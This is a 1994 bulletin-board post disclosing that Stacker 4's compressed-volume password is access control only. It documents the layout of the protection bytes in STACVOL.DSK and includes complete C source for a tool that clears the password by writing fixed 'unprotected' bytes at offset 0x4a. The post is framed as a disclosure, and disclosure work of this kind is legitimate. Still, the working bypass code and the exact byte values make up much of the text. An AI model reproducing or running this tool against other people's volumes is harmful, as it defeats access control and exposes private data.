===========================================================================
Packet: PROGUILD
Date: 07-16-94 (13:13)             Number: 552
From: ANDY BROWN                   Refer#: NONE
  To: ALL                           Recvd: NO
Subj: Stacker 4 Security Broke       Conf: (222) L-ENCRYPT
---------------------------------------------------------------------------
INTRODUCTION

Stacker 4 offers a password protection facility for its compressed
volumes. A protected volume must have the correct password entered
before the data in it may be accessed.  The password is not used to
encrypt data inside the compressed volume, it is merely supposed to
provide access control.

This article shows the format that this protection takes, and shows how
simply it can be defeated.


SUMMARY

Users of Stacker 4 should have no confidence in the protection offered
by the password option and should seek to protect their confidential
data using a tried-and-tested program such as PGP.


DATA FORMAT

Stacker stores its compressed data in a file called STACVOL.DSK. This
meta-file contains all the files on the compressed disk.  When you
access a compressed disk the STACVOL.DSK file is invisible to you.  You
can see the STACVOL.DSK file on unmounted stacker disks, and it can be
seen as a hidden file on the uncompressed drive of a compressed disk.

Stacker passwords can be up to 8 characters long and may consist of
letters, numbers symbols and anything else.  The PASSWD program does
some internal mangling of the password that results in 24 bytes of
important information in STACVOL.DSK being encrypted.  The encrypted
information seems to be the compression algorithm, disk parameters,
software version etc.  This encryption may or may not be strong, we
don't need to know whether it is since the system is compromised
elsewhere.  The system regards the password `.' as representing no
password at all -- an unprotected volume. Here lies the security flaw.
A program can simply write the 24 bytes representing an unprotected
volume into the correct area of STACVOL.DSK.  24 certainly seems to be
the magic number, resetting any more or any less results in an
unmountable disk.

This is the format of STACVOL.DSK starting at offset 0x4a


xx xx xx 0d 0a 1a
yy yy yy yy yy yy yy yy yy yy yy yy
yy yy yy yy yy yy yy yy yy yy yy yy


key:

  xx xx xx = 20 20 20 for an unprotected volume
           = 2d 2a 2d for a password protected volume

  yy ...   = 24 bytes of important information. For an unprotected
             volume, this is:

             49 f6 9d 4e ec b1 26 3d 0f 6b b2 24
             41 07 7b 92 91 67 ba 16 54 e0 c9 f7


SOURCE CODE

The following `C' program will clear the password on a STACVOL.DSK file.
The program requires one argument, the letter of the drive containing
the password protected STACVOL.DSK file.  I've successfully tried the
program on protected `Stacker anywhere' 1.44Mb and 1.2Mb floppy disks.
I suspect that it will also work fine on hard disks but am unwilling to
test it on mine!


DISCLAIMER

This is a totally unsupported program designed only to illustrate the
security flaws in Stacker's password system.  It may have errors that
cause your hard drive to catch fire and your wife to run off with the
postman. But that's tough, you've got the source so you fix them!


Regards,

- Andy

---------------------------- cut here ------------------------------
/* stacpass.c, developed using Borland C++ 3.1
   (c) 1994 Andy Brown. Always back up your STACVOL.DSK file!
   Free software, you may do whatever you like with this source code */

#include <stdio.h>
#include <stdlib.h>
#include <mem.h>
#include <io.h>
#include <ctype.h>
#include <sys\stat.h>

int main(int,char **);

int main(int argc,char **argv)
{
FILE *fp;
unsigned char buf[6],filename[20];
unsigned char nopassdata[24]=
{ 0x49,0xf6,0x9d,0x4e,0xec,0xb1,0x26,0x3d,0x0f,0x6b,0xb2,0x24,
  0x41,0x07,0x7b,0x92,0x91,0x67,0xba,0x16,0x54,0xe0,0xc9,0xf7 };

  if(argc!=2) {
    fprintf(stderr,"Usage: stacpass drive:\n");
    exit(1);
  }
  sprintf(filename,"%c:\\STACVOL.DSK",toupper(argv[1][0]));

  if(chmod(filename,S_IREAD|S_IWRITE)!=0) {
    fprintf(stderr,"cannot change access of %s to read/write\n",
      filename);
    exit(1);
  }
  if((fp=fopen(filename,"r+b"))==NULL) {
    fprintf(stderr,"cannot open stacker volume\n");
    exit(1);
  }
  if(fseek(fp,0x4a,SEEK_SET)==0 && fread(buf,1,5,fp)==5) {
    if(!memcmp(buf,"   \x0d\x0a\x1a",5)) {
      fprintf(stderr,"volume has no password\n");
      exit(1);
    }
    else if(!memcmp(buf,"\x2d\x2a\x2d\x0d\x0a\x1a",5)) {
      fseek(fp,0x4a,SEEK_SET);
      fwrite("   ",1,3,fp);
      fseek(fp,3,SEEK_CUR);
      fwrite(nopassdata,1,24,fp);
    }
    else {
      fprintf(stderr,"unrecognised STACVOL.DSK format\n");
      exit(1);
    }
  }
  else {
    fprintf(stderr,"file I/O error\n");
    exit(1);
  }
  if(chmod(filename,S_IREAD)!=0)
    fprintf(stderr,
     "Warning: STACVOL.DSK access mode left as read/write\n");

  printf("password on %s cleared.\n",filename);
  return 0;
}
---
  ILink:  NorthPaul BBS  Glasgow, Scotland  +44 (0) 236 458256
